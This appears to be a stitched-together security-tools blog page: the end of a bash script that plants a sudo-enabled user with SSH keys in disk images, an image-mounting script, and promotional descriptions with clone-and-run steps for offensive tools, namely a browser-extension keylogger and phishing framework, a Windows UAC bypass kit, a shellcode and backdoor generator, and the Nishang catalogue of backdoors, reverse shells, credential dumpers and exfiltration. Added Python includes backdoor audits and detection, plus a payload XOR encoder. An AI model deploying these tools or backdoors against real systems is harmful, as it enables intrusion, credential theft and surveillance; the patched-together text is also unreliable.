		pubkeys=$(echo ~/.ssh/id_rsa.pub)
	fi

	if [ -n "$pubkeys" ]; then
		cp "$pubkeys" "$pkfile" ||
			{ error "failed to copy $pubkeys"; return 1; }
	fi

	if [ -n "$import_ids" ]; then
		ssh-import-id --output "$pkfile.i" ${import_ids} &&
			cat "$pkfile.i" >> "$pkfile" ||
			{ error "failed to import ssh users: $import_ids"; return 1; }
	fi

	[ -f "$pkfile" ] || pkfile=""

	apply_changes "$target" "$user" "$password" "$pwauth" "$pkfile" "$dry"
	[ $? -eq 0 ] || { error "failed to apply changes"; return 1; }

	error "added user '$user' to $target"
	[ -n "$password" ] && error "set password to $password."
	$pwauth && error "enabled password auth" ||
		error "did not enable password auth"
	[ -n "$pubkeys" ] && error "added pubkeys from $pubkeys."
	[ -n "$import_ids" ] && error "imported ssh keys for $import_ids"
	return 0
}

main "$@"

# vi: ts=4 noexpandtab
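The sidedoor steps above and backdoor-image.sh touch the same three places: sshd_config (PasswordAuthentication, ChallengeResponseAuthentication, ListenAddress, PubkeyAuthentication), the account files, and /etc/sudoers.d. The Python below is an added example, not code from either project: it audits a root directory (a mounted image or a live system) for the indicators the two posts spell out. The uid 9999, the GECOS value 'backdoor' and the '#BACKDOOR_START_' sudoers marker come straight from backdoor-image.sh; the localhost-only ListenAddress expectation comes from the sidedoor hardening step. The sample tree it builds is constructed for offline use.

```python
"""Audit a root filesystem for the changes described in the sidedoor and
backdoor-image posts. Added example, not code from either project; the
sample tree built by build_sample_root() is constructed for offline use."""
import os
import re
import tempfile

LOCAL_ONLY = {"127.0.0.1", "::1", "localhost"}
# user ALL=(ALL) NOPASSWD:ALL, the form backdoor-image.sh writes to sudoers.d
NOPASSWD_RE = re.compile(r"^(\S+)\s+ALL\s*=\s*\(ALL(?::ALL)?\)\s*NOPASSWD:\s*ALL\s*$")

def parse_sshd_config(text):
    """sshd keeps the first value it reads for a keyword; ListenAddress may repeat."""
    cfg, listen = {}, []
    for raw in text.splitlines():
        parts = re.split(r"[\s=]+", raw.split("#", 1)[0].strip(), maxsplit=1)
        if len(parts) != 2:
            continue
        key, val = parts[0].lower(), parts[1].strip()
        if key == "listenaddress":
            listen.append(val)
        else:
            cfg.setdefault(key, val)
    cfg["listenaddress"] = listen
    return cfg

def host_of(addr):
    """Drop an optional :port ('[::1]:22' -> '::1', '127.0.0.1:22' -> '127.0.0.1')."""
    if addr.startswith("[") and "]" in addr:
        return addr[1:addr.index("]")]
    return addr.split(":")[0] if addr.count(":") == 1 else addr

def audit_sshd(cfg):
    findings = []
    for key, label in (("passwordauthentication", "PasswordAuthentication"),
                       ("challengeresponseauthentication", "ChallengeResponseAuthentication")):
        if cfg.get(key, "yes").lower() == "yes":   # sshd's default when the keyword is absent
            findings.append("sshd: %s is enabled" % label)
    if not cfg["listenaddress"]:
        findings.append("sshd: no ListenAddress, daemon listens on all interfaces")
    for addr in cfg["listenaddress"]:
        if host_of(addr) not in LOCAL_ONLY:
            findings.append("sshd: ListenAddress %s is not localhost" % addr)
    return findings

def audit_passwd(text):
    """Flag the account shape backdoor-image.sh creates: uid 9999 or GECOS 'backdoor'."""
    findings = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) == 7 and (f[2] == "9999" or f[4].lower() == "backdoor"):
            findings.append("passwd: %s matches the backdoor-image pattern (uid %s, gecos %r)" % (f[0], f[2], f[4]))
    return findings

def audit_sudoers(files):
    """files maps path -> contents for every file under /etc/sudoers.d."""
    findings = []
    for path, text in sorted(files.items()):
        for line in text.splitlines():
            if line.strip().startswith("#BACKDOOR_START_"):
                findings.append("sudoers: backdoor-image marker in %s" % path)
            m = NOPASSWD_RE.match(line.strip())
            if m:
                findings.append("sudoers: %s gets passwordless root via %s" % (m.group(1), path))
    return findings

def audit_root(rootd):
    """Run every check against a mounted image or a live root; returns the findings."""
    def read(rel):
        p = os.path.join(rootd, rel)
        if not os.path.isfile(p):
            return None
        with open(p, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    findings, sshd, passwd = [], read("etc/ssh/sshd_config"), read("etc/passwd")
    if sshd is not None:
        findings += audit_sshd(parse_sshd_config(sshd))
    if passwd is not None:
        findings += audit_passwd(passwd)
    sd = os.path.join(rootd, "etc/sudoers.d")
    names = os.listdir(sd) if os.path.isdir(sd) else []
    files = {os.path.join(sd, n): read(os.path.join("etc/sudoers.d", n)) for n in names}
    return findings + audit_sudoers({p: t for p, t in files.items() if t is not None})

def build_sample_root():
    """Constructed root tree showing what backdoor-image.sh leaves behind."""
    root = tempfile.mkdtemp(prefix="audit-sample-")
    samples = {
        "etc/ssh/sshd_config": "#PasswordAuthentication no\nChallengeResponseAuthentication no\nListenAddress 0.0.0.0\n",
        "etc/passwd": "root:x:0:0:root:/root:/bin/bash\nbackdoor:x:9999:9999:backdoor:/home/backdoor:/bin/bash\n",
        "etc/sudoers.d/99-backdoor": "#BACKDOOR_START_backdoor\nbackdoor ALL=(ALL) NOPASSWD:ALL\n#BACKDOOR_end_backdoor\n",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Run it with audit_root("/") on a live host or audit_root(mountpoint) on an image mounted with a read-only tool; the commented-out PasswordAuthentication line in the sample is deliberate, since sshd falls back to its default of yes when the keyword is only present as a comment, which is exactly the state backdoor-image.sh's mod_sshd_bool relies on being able to flip.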

mount-callback-umount Script:

#!/bin/bash

VERBOSITY=0
TEMP_D=""
UMOUNT=""
QEMU_DISCONNECT=""

error() { echo "$@" 1>&2; }

Usage() {
	cat <<EOF
Usage: ${0##*/} [ options ] file cmd [ args ]
   mount a file to a temporary mount point and then
   invoke the provided cmd with args
   the temporary mountpoint will be put in an environment variable
   named MOUNTPOINT.
   if any of the arguments are the literal string '_MOUNTPOINT_', then
   they will be replaced with the mount point. Example:
      ${0##*/} my.img chroot _MOUNTPOINT_ /bin/sh
   options:
    -v | --verbose             increase verbosity
         --read-only           use read-only mount.
    -p | --proc                bind mount /proc
    -s | --sys                 bind mount /sys
    -d | --dev                 bind mount /dev
         --system-mounts       bind mount /sys, /proc, /dev
         --system-resolvconf   copy host's resolvconf into /etc/resolvconf
EOF
}

# umount_r(mp) : unmount any filesystems under r
#  this is useful to unmount a chroot that had sys, proc ... mounted
umount_r() {
	local p
	for p in "$@"; do
		[ -n "$p" ] || continue
		tac /proc/mounts | sh -c '
			p=$1
			while read s mp t opt a b ; do
				[ "${mp}" = "${p}" -o "${mp#${p}/}" != "${mp}" ] ||
					continue
				umount "$mp" || exit 1
			done
			exit 0' umount_r "${p%/}"
		[ $? -eq 0 ] || return
	done
}

bad_Usage() { Usage 1>&2; [ $# -eq 0 ] || error "$@"; exit 1; }
cleanup() {
	if [ -n "$UMOUNT" ]; then
		umount_r "$UMOUNT" ||
			error "WARNING: unmounting filesystems failed!"
	fi
	if [ -n "$QEMU_DISCONNECT" ]; then
		local out=""
		out=$(qemu-nbd --disconnect "$QEMU_DISCONNECT" 2>&1) || {
			error "warning: failed: qemu-nbd --disconnect $QEMU_DISCONNECT"
			error "$out"
		}
	fi
	[ -z "${TEMP_D}" -o ! -d "${TEMP_D}" ] ||
		rm --one-file-system -Rf "${TEMP_D}" ||
		error "removal of temp dir failed!"
}

debug() {
	local level="$1"; shift;
	[ "${level}" -gt "${VERBOSITY}" ] && return
	error "${@}"
}

mount_callback_umount() {
	local img_in="$1" dev="" out="" mp="" ret="" img="" ro=""
	local opts="" bmounts="" system_resolvconf=false

	short_opts="dhpsv"
	long_opts="dev,help,opts:,proc,read-only,sys,system-mounts,system-resolvconf,verbose"
	getopt_out=$(getopt --name "${0##*/}" \
		--options "${short_opts}" --long "${long_opts}" -- "$@") &&
		eval set -- "${getopt_out}" ||
		{ bad_Usage; return 1; }

	while [ $# -ne 0 ]; do
		cur=${1}; next=${2};
		case "$cur" in
			-d|--dev) bmounts="${bmounts:+${bmounts} }/dev";;
			-h|--help) Usage ; exit 0;;
			-p|--proc) bmounts="${bmounts:+${bmounts} }/proc";;
			-s|--sys) bmounts="${bmounts:+${bmounts} }/sys";;
			   --system-mounts) bmounts="/dev /proc /sys";;
			   --system-resolvconf) system_resolvconf=true;;
			-v|--verbose) VERBOSITY=$((${VERBOSITY}+1));;
			   --opts) opts="${opts} $next"; shift;;
			   --read-only) ro="ro";;
			--) shift; break;;
		esac
		shift;
	done

	[ $# -ge 2 ] || { bad_Usage "must provide image and cmd"; return 1; }

	[ -n "$ro" ] && $system_resolvconf && {
		error "--read-only is incompatible with system-resolvconf";
		return 1;
	}

	img_in="$1"
	shift 1

	img=$(readlink -f "$img_in") ||
		{ error "failed to get full path to $img_in"; return 1; }

	[ "$(id -u)" = "0" ] || 
		{ error "sorry, must be root"; return 1; }

	TEMP_D=$(mktemp -d "${TMPDIR:-/tmp}/${0##*/}.XXXXXX") ||
		{ error "failed to make tempdir"; return 1; }
	trap cleanup EXIT

	mp="${TEMP_D}/mp"

	mkdir "$mp" || return

	local cmd="" arg="" found=false
	cmd=( )
	for arg in "$@"; do
		if [ "${arg}" = "_MOUNTPOINT_" ]; then
			debug 1 "replaced string _MOUNTPOINT_ in arguments arg ${#cmd[@]}"
			arg=$mp
		fi
		cmd[${#cmd[@]}]="$arg"
	done

	# a bare shell with no arguments: tell the user where the image is mounted
	if [ "${cmd[0]##*/}" = "bash" -o "${cmd[0]##*/}" = "sh" ] &&
	   [ ${#cmd[@]} -eq 1 ]; then
		debug 1 "invoking shell ${cmd[0]}"
		error "MOUNTPOINT=$mp"
	fi

	local hasqemu=false
	command -v "qemu-nbd" >/dev/null 2>&1 && hasqemu=true

	if out=$(set -f; mount -o loop${ro:+,$ro} $opts \
	         "$img" "$mp" 2>&1); then
		debug 1 "mounted simple filesystem image '$img_in'"
		UMOUNT="$mp"
	else
		if ! $hasqemu; then
			error "simple mount of '$img_in' failed."
			error "if this not a raw image, or it is partitioned"
			error "you must have qemu-nbd (apt-get install qemu-utils)"
			error "mount failed with: $out"
			return 1
		fi
	fi

	if [ -z "$UMOUNT" ]; then
		if [ ! -e /sys/block/nbd0 ] && ! grep -q nbd /proc/modules; then
			debug 1 "trying to load nbd module"
			modprobe nbd >/dev/null 2>&1
			udevadm settle >/dev/null 2>&1
		fi
		[ -e /sys/block/nbd0 ] || {
			error "no nbd kernel support, but simple mount failed"
			return 1;
		}

		local f nbd=""
		for f in /sys/block/nbd*; do
			[ -d "$f" -a ! -f "$f/pid" ] && nbd=${f##*/} && break
		done
		if [ -z "$nbd" ]; then
			error "failed to find an nbd device"
			return 1;
		fi
		nbd="/dev/$nbd"

		if ! qemu-nbd --connect "$nbd" "$img"; then
			error "failed to qemu-nbd connect $img to $nbd"
			return 1
		fi
		QEMU_DISCONNECT="$nbd"

		local pfile="/sys/block/${nbd#/dev/}/pid"
		if [ ! -f "$pfile" ]; then
			debug 1 "waiting on pidfile for $nbd in $pfile"
			local i=0
			while [ ! -f "$pfile" ] && i=$(($i+1)); do
				if [ $i -eq 200 ]; then
					error "giving up on pidfile $pfile for $nbd"
					return 1
				fi
				sleep .1
				debug 2 "."
			done
		fi

		debug 1 "connected $img_in to $nbd. now udev-settling"
		udevadm settle >/dev/null 2>&1

		local mdev="$nbd"
		if [ -b "${nbd}p1" ]; then
			mdev="${nbd}p1"
		fi
		if ( set -f; mount ${ro:+-o ${ro}} $opts "$mdev" "$mp" ) &&
			UMOUNT="$mp"; then
			debug 1 "mounted $mdev via qemu-nbd $nbd"
		else
			local pid="" pfile="/sys/block/${nbd#/dev/}/pid"
			{ read pid < "$pfile" ; } >/dev/null 2>&1
			[ -n "$pid" -a ! -d "/proc/$pid" ] ||
				error "qemu-nbd process seems to have died. was '$pid'"

			qemu-nbd --disconnect "$nbd" && QEMU_DISCONNECT=""
			error "failed to mount $mdev"
			return 1
		fi

	fi

	local bindmp=""
	for bindmp in $bmounts; do
		[ -d "$mp${bindmp}" ] || mkdir "$mp${bindmp}" ||
			{ error "failed mkdir $bindmp in mount"; return 1; }
		mount --bind "$bindmp" "$mp/${bindmp}" ||
			{ error "failed bind mount '$bindmp'"; return 1; }
	done

	if ${system_resolvconf}; then
		local rcf="$mp/etc/resolv.conf"
		debug 1 "replacing /etc/resolvconf"
		if [ -e "$rcf" -o -L "$rcf" ]; then
			local trcf="$rcf.${0##*/}.$$"
			rm -f "$trcf" &&
				mv "$rcf" "$trcf" && ORIG_RESOLVCONF="$trcf" ||
				{ error "failed mv $rcf"; return 1; }
		fi
		cp "/etc/resolv.conf" "$rcf" ||
			{ error "failed copy /etc/resolv.conf"; return 1; }
	fi

	debug 1 "invoking: MOUNTPOINT=$mp" "{cmd[@]}"
	MOUNTPOINT="$mp" "{cmd[@]}"
	ret=$?

	if ${system_resolvconf}; then
		local rcf="$mp/etc/resolv.conf"
		cmp --quiet "/etc/resolv.conf" "$rcf" >/dev/null ||
			error "WARN: /etc/resolv.conf changed in image!"
		rm "$rcf" &&
			{ [ -z "$ORIG_RESOLVCONF" ] || mv "$ORIG_RESOLVCONF" "$rcf"; } ||
			{ error "failed to restore /etc/resolv.conf"; return 1; }
	fi

	debug 1 "cmd returned $ret. unmounting $mp"
	umount_r "$mp" || { error "failed umount $img"; return 1; }
	UMOUNT=""
	rmdir "$mp"

	if [ -n "$QEMU_DISCONNECT" ]; then
		local out=""
		out=$(qemu-nbd --disconnect "$QEMU_DISCONNECT" 2>&1) &&
			QEMU_DISCONNECT="" || {
				error "failed to disconnect $QEMU_DISCONNECT";
				error "$out"
				return 1;
		}
	fi
	return $ret
}

mount_callback_umount "$@"

# vi: ts=4 noexpandtab

Source : https://github.com/Crazykev

LynxFramework is a browser exploitation framework that works through a browser extension.

LynxFramework is an offensive tool for web browsers that delivers its payloads as a browser extension, currently for Google Chrome, with Firefox support planned. It works by injecting a script into the pages the target visits in order to retrieve the targeted data.

LynxFramework has been tested on Windows, Mac OS X, Ubuntu, and Kali 2.0.

ONLINE PAYLOADS:
+ XSSKeylogger : XSS-based keylogger
+ ForceDownload : force a file download
+ paytoweb : www.paytoweb.com
+ Paypal : https://www.paypal.com/signin/
+ Facebook : http://facebook.com

usage:

git clone https://github.com/graniet/LynxFramework && cd LynxFramework
python LynxFramework.py
set:payload (what do you want)
then open your Chrome browser.

Source: https://github.com/graniet | https://lynxframework.com/


BypassUAC – Defeating Windows User Account Control by abusing the built-in Windows AutoElevate backdoor.

BypassUAC defeats Windows User Account Control (UAC) by abusing the built-in Windows AutoElevate mechanism, which its author calls a backdoor: Microsoft-signed binaries whose manifests request auto-elevation run at High integrity without a consent prompt, and each method below finds a way to make one of them load or launch attacker-controlled code.

System Requirements
1. x86-32/x64 Windows 7/8/8.1/10 (client; some methods however work on server versions too).
2. Admin account with UAC set to default settings required.

Usage
Run the executable from the command line: BypassUAC_x86 [Key] [Param] or BypassUAC_x64 [Key] [Param]. See “Run examples” below for more info.
The first param is the number of the method to use; the second is an optional command (executable file name including full path) to run. The second param can be empty, in which case the program will execute an elevated cmd.exe from the system32 folder.
Keys (watch debug output with dbgview or similar for more info):
1 – Leo Davidson sysprep method, this will work only on Windows 7 and Windows 8, used in multiple malware;
2 – Tweaked Leo Davidson sysprep method, this will work only on Windows 8.1.9600;
3 – Leo Davidson method tweaked by WinNT/Pitou developers, works from Windows 7 up to 10th2 10532;
4 – Application Compatibility Shim RedirectEXE method, from WinNT/Gootkit. Works from Windows 7 up to 8.1.9600;
5 – ISecurityEditor WinNT/Simda method, used to turn off UAC, works from Windows 7 up to Windows 10th1 100136;
6 – Wusa method used by Win32/Carberp, tweaked to work with Windows 8/8.1 also;
7 – Wusa method, tweaked to work from Windows 7 up to 10th1 10136;
8 – Slightly modified Leo Davidson method used by Win32/Tilon, works only on Windows 7;
9 – Hybrid method, combination of WinNT/Simda and Win32/Carberp + AVrf, works from Windows 7 up to 10th1 10136;
10 – Hybrid method, abusing appinfo.dll way of whitelisting autoelevated applications and KnownDlls cache changes, works from Windows 7 up to 10th2 10532;
11 – WinNT/Gootkit second method based on the memory patching from MS “Fix it” patch shim (and as side effect – arbitrary dll injection), works from Windows 7 up to 8.1.9600;
12 – Windows 10 sysprep method, abusing different dll dependency added in Windows 10 (works up to 10th2 10558);
13 – Hybrid method, abusing appinfo.dll way of whitelisting MMC console commands and EventViewer missing dependency, works from Windows 7 up to 10rs1 11082;
14 – WinNT/Sirefef method, abusing appinfo.dll way of whitelisting OOBE.exe, works from Windows 7 up to 10th2 10558;
15 – Win32/Addrop method, also used in Metasploit uacbypass module, works from Windows 7 up to 10rs1 11082;
16 – Hybrid method working together with Microsoft GWX backdoor, work from Windows 7 up to 10rs1 11082.

Note:
+ Several methods require process injection, so they won’t work from wow64, use x64 edition of this tool;
+ Method (4) unavailable in 64 bit edition because of Shim restriction;
+ Method (6) unavailable in wow64 environment starting from Windows 8. Also target application unavailable in Windows 10;
+ Method (11) implemented in x86-32 version;
+ Method (13) implemented only in x64 version.
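What the sixteen methods above have in common is the shape a defender can hunt for: an auto-elevated, Microsoft-signed host (sysprep.exe, wusa.exe, the mmc.exe host behind Event Viewer, OOBE.exe) runs at High integrity and then loads or launches attacker-chosen code, so a High-integrity command interpreter whose parent is one of those hosts deserves an alert even though no consent prompt fired. The following detection heuristic is an added example, not part of BypassUAC; the log schema and every log line in it are constructed, and the host and child sets are assumptions rather than an inventory of every auto-elevating binary.

```python
"""
Added example, not part of BypassUAC: flag a High-integrity LOLBin whose parent
is one of the auto-elevating hosts abused by the methods on this page.
The log schema and all log lines are constructed for this example.
"""
import csv
import io
from dataclasses import dataclass
from typing import List

# Auto-elevating hosts that the method list abuses (assumption: which binaries
# auto-elevate is decided by each binary's embedded manifest, so audit your own
# builds rather than trusting this set).
AUTOELEVATE_HOSTS = {"sysprep.exe", "wusa.exe", "mmc.exe", "oobe.exe"}

# Children an elevated host has no legitimate reason to spawn (assumption).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe",
                       "mshta.exe", "wscript.exe", "cscript.exe"}

# Constructed process-creation telemetry, not a real Sysmon/EDR export.
# The svchost.exe line is the legitimate path: the AppInfo service starts the
# elevated process after a consent prompt, so its parent is svchost.exe.
SAMPLE_LOG = r"""ts,parent_image,parent_integrity,image,integrity
2016-02-01T10:00:01Z,explorer.exe,Medium,eventvwr.exe,High
2016-02-01T10:00:02Z,eventvwr.exe,High,mmc.exe,High
2016-02-01T10:00:03Z,mmc.exe,High,cmd.exe,High
2016-02-01T10:05:00Z,explorer.exe,Medium,cmd.exe,Medium
2016-02-01T10:06:00Z,C:\Windows\System32\sysprep\sysprep.exe,High,C:\Windows\System32\cmd.exe,High
2016-02-01T10:07:00Z,wusa.exe,High,dllhost.exe,High
2016-02-01T10:08:00Z,svchost.exe,System,cmd.exe,High
"""


@dataclass
class Alert:
    ts: str
    parent: str
    child: str
    reason: str


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path, whatever the separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_autoelevate_abuse(log_text: str) -> List[Alert]:
    alerts: List[Alert] = []
    for row in csv.DictReader(io.StringIO(log_text)):
        parent = image_name(row["parent_image"])
        child = image_name(row["image"])
        if parent not in AUTOELEVATE_HOSTS:
            continue
        # Both sides must be High: a Medium parent means the host was not
        # auto-elevated, and a Medium child means no integrity was gained.
        if row["parent_integrity"] != "High" or row["integrity"] != "High":
            continue
        if child in SUSPICIOUS_CHILDREN:
            alerts.append(Alert(row["ts"], parent, child,
                                "auto-elevated host spawned %s at High integrity" % child))
    return alerts


if __name__ == "__main__":
    for a in detect_autoelevate_abuse(SAMPLE_LOG):
        print(a.ts, a.parent, "->", a.child, ":", a.reason)
```

On the sample, the mmc.exe and sysprep.exe rows fire; the eventvwr.exe to mmc.exe hop, the Medium-integrity cmd.exe, and the svchost.exe-parented elevation do not. Map the five columns onto your own process-creation telemetry before using it.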

Run examples:
BypassUAC_x86.exe <1-16> cmd.exe
BypassUAC_x64.exe 3 cmd.exe

Download : BypassUAC.zip
Source : https://github.com/xsysvermin

shellsploit-framework v1-beta : New Generation Exploit Development Kit.

Shellsploit lets you generate customized shellcode, backdoors and injectors for various operating systems, and lets you obfuscate every byte of the result via encoders.
Requirement:
+ capstone
+ readline
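The encoders mentioned above exist because raw shellcode often contains bytes the delivery path cannot carry: 0x00 ends a C string before the whole payload is copied, and 0x0a/0x0d break line-oriented inputs. The simplest encoder XORs every byte with a key chosen so that no encoded byte is a bad character, and a small decoder stub undoes it at run time. The block below is an added example of that encoder, not shellsploit's own code; the sample payload bytes are constructed filler, not working shellcode.

```python
"""
Added example, not shellsploit's own encoder: single-byte XOR encoding with a
key chosen to keep every encoded byte out of a bad-character set.
"""
from typing import Optional, Tuple

DEFAULT_BAD_CHARS = b"\x00\x0a\x0d"


def find_xor_key(payload: bytes, bad_chars: bytes = DEFAULT_BAD_CHARS) -> Optional[int]:
    """First key in 1..255 that encodes payload without producing a bad char.

    The key is also rejected if it is itself a bad char, because the decoder
    stub that precedes the encoded payload has to embed it."""
    for key in range(1, 256):
        if key in bad_chars:
            continue
        if all((b ^ key) not in bad_chars for b in payload):
            return key
    return None


def xor_encode(payload: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in payload)


def xor_decode(encoded: bytes, key: int) -> bytes:
    return xor_encode(encoded, key)   # XOR is its own inverse


def encode_avoiding(payload: bytes, bad_chars: bytes = DEFAULT_BAD_CHARS) -> Tuple[int, bytes]:
    """Pick a key, encode, and prove the round trip before handing the bytes out."""
    key = find_xor_key(payload, bad_chars)
    if key is None:
        raise ValueError("no single-byte XOR key avoids the bad chars; "
                         "use a multi-byte key or a different encoder")
    encoded = xor_encode(payload, key)
    if xor_decode(encoded, key) != payload:
        raise AssertionError("round trip failed")
    return key, encoded


def to_c_string(data: bytes) -> str:
    """Print bytes the way shellcode generators emit them for a C buffer."""
    return '"' + "".join("\\x%02x" % b for b in data) + '"'


if __name__ == "__main__":
    sample = b"\x31\xc0\x50\x68\x00\x0a\x2f\x2f\x73\x68"   # constructed filler
    key, enc = encode_avoiding(sample)
    print("key=0x%02x" % key, to_c_string(enc))
```

A payload that contains every byte value defeats any single-byte key, which is why real encoders fall back to multi-byte or rolling keys; the example raises rather than silently emitting a payload that will be truncated.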

changelog 27/1/2016: shell: exec scripts on maintenance.

Usage & Installation:

git clone https://github.com/b3mb4m/shellsploit-framework && cd shellsploit-framework
sudo pip install capstone
sudo pip install readline
python setup.py -s install
shellsploit (for run)

Updates:
cd shellsploit-framework
git pull origin master

Source : https://github.com/b3mb4m

Nishang v-0.6.3 – PowerShell for penetration testing and offensive security.

Changelog v0.6.3:
+ Added Invoke-Interceptor to the MITM directory.

DESCRIPTION
The text that follows is the description Nishang ships for Show-TargetScreen, its MJPEG desktop streamer; Invoke-Interceptor itself is an intercepting HTTP(S) proxy in the MITM directory.
Show-TargetScreen uses MJPEG to stream a target’s desktop in real time. With the -Reverse switch it connects back to a standard netcat listening on a port; with -Bind it listens on a port that a standard netcat can connect to.
A netcat listener which relays the connection to a local port can be used as the listener. A browser which supports MJPEG (Firefox) is then pointed to the local port to see the remote desktop.
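The reason a plain browser can render the stream is the wire format: an MJPEG stream is one HTTP response of type multipart/x-mixed-replace in which each part carries a single JPEG, and the browser repaints on every part. The block below is an added example of that framing plus a parser that recovers the frames from a captured stream, not Nishang code; the frames are constructed placeholder bytes with JPEG start/end markers, not screenshots, and the boundary token is an assumption.

```python
"""
Added example, not Nishang code: build and parse a multipart/x-mixed-replace
(MJPEG) stream of the kind Show-TargetScreen sends to a netcat relay.
"""
from typing import Iterable, List

BOUNDARY = b"mjpegframe"   # assumption: any token not expected inside the headers works


def response_header(boundary: bytes = BOUNDARY) -> bytes:
    """The one HTTP response header the browser ever sees; parts follow forever."""
    return (b"HTTP/1.0 200 OK\r\n"
            b"Content-Type: multipart/x-mixed-replace; boundary=" + boundary + b"\r\n"
            b"Cache-Control: no-cache\r\n"
            b"\r\n")


def encode_frame(jpeg: bytes, boundary: bytes = BOUNDARY) -> bytes:
    """One part: delimiter, part headers, the JPEG bytes."""
    return (b"--" + boundary + b"\r\n"
            b"Content-Type: image/jpeg\r\n"
            b"Content-Length: " + str(len(jpeg)).encode() + b"\r\n"
            b"\r\n" + jpeg + b"\r\n")


def encode_stream(frames: Iterable[bytes], boundary: bytes = BOUNDARY) -> bytes:
    return response_header(boundary) + b"".join(encode_frame(f, boundary) for f in frames)


def _header_value(headers: bytes, name: bytes) -> bytes:
    for line in headers.split(b"\r\n"):
        key, _, value = line.partition(b":")
        if key.strip().lower() == name:
            return value.strip()
    return b""


def parse_stream(data: bytes) -> List[bytes]:
    """Recover complete JPEG frames from a captured MJPEG response.

    Frames are cut by Content-Length, not by searching for the boundary, since
    a JPEG may legitimately contain the boundary bytes.  A truncated last part
    (stream cut mid-frame) is dropped rather than returned half-written."""
    head_end = data.find(b"\r\n\r\n")
    if head_end == -1:
        return []
    ctype = _header_value(data[:head_end], b"content-type")
    marker = b"boundary="
    if marker not in ctype:
        return []
    boundary = ctype.split(marker, 1)[1].split(b";")[0].strip(b'" ')
    delim = b"--" + boundary
    frames: List[bytes] = []
    pos = head_end + 4
    while True:
        start = data.find(delim, pos)
        if start == -1:
            break
        hdr_end = data.find(b"\r\n\r\n", start)
        if hdr_end == -1:
            break
        length_text = _header_value(data[start + len(delim):hdr_end], b"content-length")
        if not length_text.isdigit():
            break
        length = int(length_text)
        body_start = hdr_end + 4
        frame = data[body_start:body_start + length]
        if len(frame) < length:
            break
        frames.append(frame)
        pos = body_start + length
    return frames


if __name__ == "__main__":
    demo = [b"\xff\xd8AAA\xff\xd9", b"\xff\xd8BBBB\xff\xd9"]   # constructed, not real JPEGs
    print(parse_stream(encode_stream(demo)) == demo)
```

Writing the output of encode_stream to the socket that netcat relays is all a streamer has to do; on the analyst side, parse_stream over a pcap's reassembled TCP payload yields the frames an attacker saw.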

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Scripts: Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster, FireListener : A pair of scripts for egress testing.
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys : Get WLAN keys in plain text from a target.
– Keylogger : Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade : Dump user passwords in plain text on Windows 8.1 and Server 2012.
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– Create-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote : Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay : Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat : Send commands and scripts to a specified Gmail account to be executed by Invoke-PsGcatAgent.
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
